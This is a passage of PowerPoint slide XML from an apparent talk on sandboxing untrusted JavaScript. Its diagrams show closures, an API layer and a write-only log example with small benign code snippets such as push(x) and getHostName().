            <a:ext cx="312376" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="accent3"/>
            </a:solidFill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4"/>
            <a:endCxn id="11" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="605812" y="3187369"/>
            <a:ext cx="388576" cy="381000"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700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376378" y="4262578"/>
            <a:ext cx="466442" cy="1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835032" y="3406741"/>
            <a:ext cx="673339" cy="228603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2400" y="4252184"/>
            <a:ext cx="2394167" cy="126188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 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>Resources,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>DOM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" sz="2600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44" name="Oval 43"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152398" y="1356373"/>
            <a:ext cx="2394169" cy="4419601"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln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705601" y="2352020"/>
            <a:ext cx="2133600" cy="27838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chemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri (Body)"/>
                <a:cs typeface="Calibri (Body)"/>
              </a:rPr>
              <a:t>Untrusted JavaScript</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri (Body)"/>
                <a:cs typeface="Calibri (Body)"/>
              </a:rPr>
              <a:t>code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1295400" y="3488381"/>
            <a:ext cx="457200" cy="457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Straight Connector 96"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="13" idx="4"/>
            <a:endCxn id="92" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="1104900" y="3069281"/>
            <a:ext cx="304800" cy="533400"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700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 flipH="1">
            <a:off x="1295400" y="4174179"/>
            <a:ext cx="457200" cy="5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4" name="Picture 83" descr="Screen shot 2011-05-13 at 5.00.18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088242" y="3543617"/>
            <a:ext cx="5417775" cy="311741"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="107" name="Group 106"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="838200" y="1066800"/>
            <a:ext cx="3200400" cy="777227"/>
            <a:chOff x="3886200" y="1203973"/>
            <a:chExt cx="4953000" cy="777227"/>
          </a:xfrm>
          <a:effectLst/>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="108" name="Oval Callout 107"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3886200" y="1203973"/>
              <a:ext cx="4953000" cy="777227"/>
            </a:xfrm>
            <a:prstGeom prst="wedgeEllipseCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val -11486"/>
                <a:gd name="adj2" fmla="val 15942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886200" y="1307067"/>
              <a:ext cx="495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latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>window.location</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0" smtClean="0">
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:endParaRPr lang="en-US" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="112" name="TextBox 111"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1257299" y="1828800"/>
            <a:ext cx="64770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295400" y="3352800"/>
            <a:ext cx="64770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r>
              <a:rPr lang="en-US" sz="2800" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>4</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" baseline="-25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81000" y="3429000"/>
            <a:ext cx="64770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r>
              <a:rPr lang="en-US" sz="2800" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>3</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" baseline="-25000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="116" name="TextBox 115"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="762000" y="2590800"/>
            <a:ext cx="64770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r>
              <a:rPr lang="en-US" sz="2800" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" baseline="-25000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="64" name="Group 63"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2471899" y="1981200"/>
            <a:ext cx="4233702" cy="3307244"/>
            <a:chOff x="2471899" y="1981200"/>
            <a:chExt cx="4233702" cy="3307244"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="94" name="TextBox 93"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4191000" y="4800600"/>
              <a:ext cx="1295400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API</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2400" dirty="0"/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471899" y="1981200"/>
              <a:ext cx="4233702" cy="3307244"/>
              <a:chOff x="2471899" y="1981200"/>
              <a:chExt cx="4233702" cy="3307244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2471899" y="2145268"/>
                <a:ext cx="2100104" cy="436180"/>
                <a:chOff x="2353003" y="3198434"/>
                <a:chExt cx="2100104" cy="436180"/>
              </a:xfrm>
              <a:effectLst/>
            </p:grpSpPr>
            <p:cxnSp>
              <p:nvCxnSpPr>
                <p:cNvPr id="67" name="Straight Arrow Connector 66"/>
                <p:cNvCxnSpPr>
                  <a:stCxn id="81" idx="2"/>
                </p:cNvCxnSpPr>
                <p:nvPr/>
              </p:nvCxnSpPr>
              <p:spPr>
                <a:xfrm rot="10800000">
                  <a:off x="2353003" y="3634611"/>
                  <a:ext cx="2100104" cy="3"/>
                </a:xfrm>
                <a:prstGeom prst="straightConnector1">
                  <a:avLst/>
                </a:prstGeom>
                <a:ln>
                  <a:solidFill>
                    <a:schemeClr val="accent3"/>
                  </a:solidFill>
                  <a:prstDash val="dash"/>
                  <a:tailEnd type="arrow" w="lg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TextBox 72"/>
                <p:cNvSpPr txBox="1"/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="2929104" y="3198434"/>
                  <a:ext cx="88629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Closure</a:t>
                  </a:r>
                  <a:endParaRPr lang="en-US" dirty="0"/>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="124" name="Straight Arrow Connector 123"/>
              <p:cNvCxnSpPr>
                <a:endCxn id="81" idx="6"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm rot="10800000" flipV="1">
                <a:off x="5029204" y="2581445"/>
                <a:ext cx="1676397" cy="1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/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="4572000" y="2286000"/>
                <a:ext cx="647701" cy="2514600"/>
                <a:chOff x="3886200" y="2156696"/>
                <a:chExt cx="647701" cy="2981714"/>
              </a:xfrm>
              <a:effectLst/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3886200" y="2156696"/>
                  <a:ext cx="647701" cy="578928"/>
                  <a:chOff x="3810000" y="1928096"/>
                  <a:chExt cx="647701" cy="578928"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="81" name="Oval 80"/>
                  <p:cNvSpPr/>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr>
                  <a:xfrm>
                    <a:off x="3810003" y="2049825"/>
                    <a:ext cx="457200" cy="457199"/>
                  </a:xfrm>
                  <a:prstGeom prst="ellipse">
                    <a:avLst/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solidFill>
                      <a:schemeClr val="accent3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3810000" y="1928096"/>
                    <a:ext cx="647701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dirty="0" smtClean="0"/>
                      <a:t>f</a:t>
                    </a:r>
                    <a:r>
                      <a:rPr lang="en-US" sz="2800" baseline="-25000" dirty="0" smtClean="0"/>
                      <a:t>1</a:t>
                    </a:r>
                    <a:endParaRPr lang="en-US" sz="2800" baseline="-25000" dirty="0"/>
                  </a:p>
                </p:txBody>
              </p:sp>
            </p:grpSp>
            <p:grpSp>
              <p:nvGrpSpPr>
                <p:cNvPr id="58" name="Group 57"/>
                <p:cNvGrpSpPr/>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr>
                <a:xfrm>
                  <a:off x="3886200" y="4505925"/>
                  <a:ext cx="647701" cy="632485"/>
                  <a:chOff x="4705350" y="4625316"/>
                  <a:chExt cx="647701" cy="632485"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="83" name="Oval 82"/>
                  <p:cNvSpPr/>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr>
                  <a:xfrm>
                    <a:off x="4724400" y="4800602"/>
                    <a:ext cx="438149" cy="457199"/>
                  </a:xfrm>
                  <a:prstGeom prst="ellipse">
                    <a:avLst/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solidFill>
                      <a:schemeClr val="accent3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TextBox 79"/>
                  <p:cNvSpPr txBox="1"/>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr>
                  <a:xfrm>
                    <a:off x="4705350" y="4625316"/>
                    <a:ext cx="647701" cy="52322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dirty="0" smtClean="0"/>
                      <a:t>f</a:t>
                    </a:r>
                    <a:r>
                      <a:rPr lang="en-US" sz="2800" baseline="-25000" dirty="0" smtClean="0"/>
                      <a:t>n</a:t>
                    </a:r>
                    <a:endParaRPr lang="en-US" sz="2800" baseline="-25000" dirty="0"/>
                  </a:p>
                </p:txBody>
              </p:sp>
            </p:grpSp>
            <p:cxnSp>
              <p:nvCxnSpPr>
                <p:cNvPr id="54" name="Straight Connector 53"/>
                <p:cNvCxnSpPr/>
                <p:nvPr/>
              </p:nvCxnSpPr>
              <p:spPr>
                <a:xfrm rot="16200000" flipH="1">
                  <a:off x="3259143" y="3740620"/>
                  <a:ext cx="1711318" cy="1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  <a:prstDash val="sysDot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/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="2471899" y="4114800"/>
                <a:ext cx="2100102" cy="458790"/>
                <a:chOff x="2471899" y="4114800"/>
                <a:chExt cx="2100102" cy="458790"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:cxnSp>
              <p:nvCxnSpPr>
                <p:cNvPr id="65" name="Straight Arrow Connector 64"/>
                <p:cNvCxnSpPr/>
                <p:nvPr/>
              </p:nvCxnSpPr>
              <p:spPr>
                <a:xfrm rot="10800000">
                  <a:off x="2471899" y="4572000"/>
                  <a:ext cx="2100102" cy="1590"/>
                </a:xfrm>
                <a:prstGeom prst="straightConnector1">
                  <a:avLst/>
                </a:prstGeom>
                <a:ln>
                  <a:solidFill>
                    <a:schemeClr val="accent3"/>
                  </a:solidFill>
                  <a:prstDash val="dash"/>
                  <a:tailEnd type="arrow" w="lg" len="lg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55"/>
                <p:cNvSpPr txBox="1"/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3076107" y="4114800"/>
                  <a:ext cx="886293" cy="369332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Closure</a:t>
                  </a:r>
                  <a:endParaRPr lang="en-US" dirty="0"/>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="60" name="Straight Arrow Connector 59"/>
              <p:cNvCxnSpPr/>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm rot="10800000">
                <a:off x="5029200" y="4572000"/>
                <a:ext cx="1676397" cy="1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91000" y="1981200"/>
                <a:ext cx="1295400" cy="3307244"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/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  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:endParaRP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5562600" y="2209800"/>
                <a:ext cx="813043" cy="36933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Access</a:t>
                </a:r>
                <a:endParaRPr lang="en-US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5638800" y="4202668"/>
                <a:ext cx="813043" cy="36933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Access</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="85" name="Rectangle 84"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="50209" y="1042625"/>
            <a:ext cx="4591050" cy="536575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4114800" y="1066800"/>
            <a:ext cx="4953000" cy="1066801"/>
            <a:chOff x="3886200" y="990600"/>
            <a:chExt cx="4953000" cy="1066801"/>
          </a:xfrm>
          <a:effectLst/>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="39" name="Oval Callout 38"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3886200" y="990600"/>
              <a:ext cx="4953000" cy="1066801"/>
            </a:xfrm>
            <a:prstGeom prst="wedgeEllipseCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val -34423"/>
                <a:gd name="adj2" fmla="val 70833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191000" y="1142999"/>
              <a:ext cx="4495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"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>function </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>getHostName</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0" smtClean="0">
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>()</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" dirty="0" smtClean="0">
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>  {return </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>window.location.host</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0" smtClean="0">
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>} </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:endParaRPr lang="en-US" dirty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6705598" y="2352021"/>
            <a:ext cx="2133604" cy="2783860"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="50800">
            <a:solidFill>
              <a:schemeClr val="accent2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705597" y="5262265"/>
            <a:ext cx="2133604" cy="49244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Sandbox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53" grpId="0" animBg="1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28600" y="5329535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Untrusted code must only be able to write to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>log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Design: Write-only Log Example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04800" y="1760232"/>
            <a:ext cx="4114800" cy="2583168"/>
            <a:chOff x="-19756" y="2209800"/>
            <a:chExt cx="4648200" cy="3039320"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="TextBox 16"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-19756" y="4488656"/>
              <a:ext cx="4648200" cy="76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accent3"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>var</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="accent3"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t> log = </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="accent3"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t> [&lt;critical&gt;,0,0]</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier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96710" y="2209800"/>
              <a:ext cx="1903591" cy="1986525"/>
              <a:chOff x="496710" y="2209800"/>
              <a:chExt cx="1903591" cy="1986525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96710" y="2209800"/>
                <a:ext cx="1903591" cy="1981201"/>
                <a:chOff x="618791" y="1752600"/>
                <a:chExt cx="1286210" cy="1927021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618792" y="1752600"/>
                  <a:ext cx="1286209" cy="1927021"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="25400">
                  <a:solidFill>
                    <a:schemeClr val="accent3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618791" y="2413326"/>
                  <a:ext cx="1286208" cy="1588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618792" y="3086692"/>
                  <a:ext cx="1286208" cy="1817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711" y="2256015"/>
                <a:ext cx="1903590" cy="4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Courier"/>
                    <a:cs typeface="Courier"/>
                  </a:rPr>
                  <a:t>&lt;critical&gt;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6711" y="2973262"/>
                <a:ext cx="1903589" cy="54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0</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="2400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96711" y="3653136"/>
                <a:ext cx="1903589" cy="54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0</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="42" name="Rounded Rectangle 41"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1104900" y="5105400"/>
            <a:ext cx="6972300" cy="118745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2200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>log</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> never leaks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 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</a:rPr>
              <a:t>Sandbox prevents direct access to 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log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</a:rPr>
              <a:t>API only allows data to be written to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>log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2792091" y="1295400"/>
            <a:ext cx="6123309" cy="1833265"/>
            <a:chOff x="1991991" y="1295400"/>
            <a:chExt cx="6123309" cy="1833265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3973189" y="1524000"/>
              <a:ext cx="3608711" cy="906691"/>
            </a:xfrm>
            <a:prstGeom prst="wedgeRoundRectCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val -23297"/>
                <a:gd name="adj2" fmla="val 51294"/>
                <a:gd name="adj3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function </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2200" dirty="0" err="1" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>push(x</a:t>
              </a:r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)</a:t>
              </a:r>
            </a:p>
            <a:p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  {</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2200" dirty="0" err="1" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>log.push(x</a:t>
              </a:r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)}</a:t>
              </a:r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cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="33" name="Straight Arrow Connector 32"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="25" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="10800000" flipV="1">
              <a:off x="1991991" y="1977345"/>
              <a:ext cx="1981199" cy="1587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3429000" y="1295400"/>
              <a:ext cx="4686300" cy="1833265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29000" y="2590800"/>
              <a:ext cx="46863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API</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39" name="Oval 38"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="76200" y="1143000"/>
            <a:ext cx="2971800" cy="3886200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Design: Adding a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>store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" name="Group 36"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="304800" y="1760232"/>
            <a:ext cx="4114800" cy="2583168"/>
            <a:chOff x="-19756" y="2209800"/>
            <a:chExt cx="4648200" cy="3039320"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="TextBox 16"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-19756" y="4488656"/>
              <a:ext cx="4648200" cy="760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accent3"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>var</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="accent3"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t> log = </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="accent3"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t> [&lt;critical&gt;,0,0]</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="7" name="Group 35"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="496710" y="2209800"/>
              <a:ext cx="1903591" cy="1986525"/>
              <a:chOff x="496710" y="2209800"/>
              <a:chExt cx="1903591" cy="1986525"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="9" name="Group 12"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="496710" y="2209800"/>
                <a:ext cx="1903591" cy="1981201"/>
                <a:chOff x="618791" y="1752600"/>
                <a:chExt cx="1286210" cy="1927021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618792" y="1752600"/>
                  <a:ext cx="1286209" cy="1927021"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="25400">
                  <a:solidFill>
                    <a:schemeClr val="accent3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618791" y="2413326"/>
                  <a:ext cx="1286208" cy="1588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618792" y="3086692"/>
                  <a:ext cx="1286208" cy="1817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711" y="2256015"/>
                <a:ext cx="1903590" cy="434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Courier"/>
                    <a:cs typeface="Courier"/>
                  </a:rPr>
                  <a:t>&lt;critical&gt;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6711" y="2973262"/>
                <a:ext cx="1903589" cy="54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0</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="2400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96711" y="3653136"/>
                <a:ext cx="1903589" cy="54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0</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="12" name="Group 33"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2792091" y="1295401"/>
            <a:ext cx="6123309" cy="3048000"/>
            <a:chOff x="1991991" y="1295401"/>
            <a:chExt cx="6123309" cy="3080342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3973189" y="1524000"/>
              <a:ext cx="3608711" cy="906691"/>
            </a:xfrm>
            <a:prstGeom prst="wedgeRoundRectCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val -23297"/>
                <a:gd name="adj2" fmla="val 51294"/>
                <a:gd name="adj3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function </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2200" dirty="0" err="1" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>push(x</a:t>
              </a:r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)</a:t>
              </a:r>
            </a:p>
            <a:p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  {</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2200" dirty="0" err="1" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>log.push(x</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>)}</a:t>
              </a:r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cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="33" name="Straight Arrow Connector 32"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="25" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="10800000" flipV="1">
              <a:off x="1991991" y="1977345"/>
              <a:ext cx="1981199" cy="1587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3429000" y="1295401"/>
              <a:ext cx="4686300" cy="3080342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29000" y="3913691"/>
              <a:ext cx="46863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API</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39" name="Oval 38"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="76200" y="1143000"/>
            <a:ext cx="2971800" cy="3886200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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="13" name="Group 58"/>
